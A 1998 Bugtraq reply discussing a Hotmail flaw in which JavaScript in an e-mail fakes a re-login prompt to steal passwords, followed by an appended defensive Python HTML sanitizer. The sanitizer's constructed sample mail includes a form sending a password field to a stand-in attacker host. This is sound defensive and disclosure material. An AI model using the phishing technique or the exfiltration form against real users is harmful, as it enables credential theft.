[7742] in bugtraq


Re: Serious Security Hole in Hotmail

daemon@ATHENA.MIT.EDU (Jeff Mcadams)
Tue Aug 25 13:36:14 1998

Date: 	Tue, 25 Aug 1998 07:38:14 -0400
Reply-To: Jeff Mcadams <jeffm@IGLOU.COM>
From: Jeff Mcadams <jeffm@IGLOU.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <01BDCF6A.8D80E680@bOoNdOcK> from "Tom Cervenka" at Aug 24,
              98 02:21:56 pm

Thus spake Tom Cervenka

>We have just found a serious security hole in Microsoft's Hotmail
>service (http://www.hotmail.com) which allows malicious users to easily
>steal the passwords of Hotmail users. The exploit involves sending an
>e-mail message that contains embedded JavaScript code. When a Hotmail
>user views the message, the JavaScript code forces the user to re-login
>to Hotmail. In doing so, the victim's username and password are sent to
>the malicious user by e-mail. (see
>http://www.because-we-can.com/hotmail/default.htm for demo)

This is a variation on the Spartan Horse announced by Dan Gregorie over
a week ago, and covered on news.com on the 14th.  The Spartan Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com article is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d

The variation is that the Spartan Horse, as designed on the
www.thetopoftheworld.com site, mimics the Windows95/98
Dial-Up-Networking dialog box.

This wasn't originally sent to BUGTRAQ because it doesn't exploit a
specific flaw in programming code in any software, like this "Hot"Mail
exploit does.  Perhaps that was an oversight on Dan's part and mine, but I
did want to set the record straight on the origination of this idea for
Dan's sake.
--
Jeff McAdams                            Email: jeffm@iglou.com
Head Network Administrator              Voice: (502) 966-3848
IgLou Internet Services                        (800) 436-4456
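As an added, defender-side illustration (not part of this thread, and not anything Hotmail ran), the following allowlist sanitizer built on Python's standard html.parser shows the kind of filtering a webmail front end needs so that script tags, event-handler attributes, forms and javascript: links in a received HTML message never reach the reader's browser. The sample message, the tag/attribute allowlist and the names sanitize_html_mail and MailSanitizer are all constructed assumptions for this example.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist (constructed for this example): only these tags survive, and only
# these attributes on them. Anything not listed is removed rather than blocklisted.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol",
                "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
# Elements whose whole content (not just the tag) is discarded.
DROP_CONTENT_TAGS = {"script", "style", "form", "iframe", "object", "embed"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


def _safe_url(url):
    """Accept only absolute http/https/mailto URLs. Whitespace and control
    characters are removed before the check because browsers ignore them
    inside a scheme (so 'java\\tscript:' would otherwise slip through)."""
    cleaned = "".join(ch for ch in url if ord(ch) > 32).lower()
    return cleaned.startswith(SAFE_URL_SCHEMES)


class MailSanitizer(HTMLParser):
    """Re-serialises an HTML mail body keeping only allowlisted markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitised fragments, joined at the end
        self.drop_depth = 0  # > 0 while inside a dropped-content element
        self.removed = []    # audit trail of what was stripped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth += 1
            self.removed.append(f"<{tag}>")
            return
        if self.drop_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.removed.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            # Every on* attribute is an event handler, so none is ever kept.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.removed.append(f"{tag}@{name}")
                continue
            if name == "href" and not _safe_url(value):
                self.removed.append(f"{tag}@href={value!r}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> and friends

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            if self.drop_depth:
                self.drop_depth -= 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Entities were decoded on input; re-escape so text can never become markup.
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))
    # Comments, declarations and processing instructions fall through to the
    # base class no-op handlers and are therefore dropped.


def sanitize_html_mail(html):
    """Return (clean_html, list_of_removed_items) for an incoming message body."""
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample of a hostile HTML mail body: a script, a form, an
# event handler and a javascript: link, next to harmless formatting.
SAMPLE_MAIL = (
    '<p>Hi! <b onmouseover="/* constructed handler */">Read this</b>.</p>'
    '<script>/* constructed: would re-prompt the reader for a password */</script>'
    '<form action="http://attacker.invalid/collect"><input name="pw"></form>'
    '<img src="x" onerror="/* constructed handler */">'
    '<a href="javascript:void(0)">click</a> '
    '<a href="https://www.hotmail.com/">Hotmail</a>'
)

if __name__ == "__main__":
    clean, removed = sanitize_html_mail(SAMPLE_MAIL)
    print(clean)
    print("stripped:", removed)
```

The design point is the allowlist: the sanitizer never tries to recognise "bad" script, it simply refuses to emit anything it was not told is safe, and it logs every removal so the mail pipeline can flag messages whose markup was stripped.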
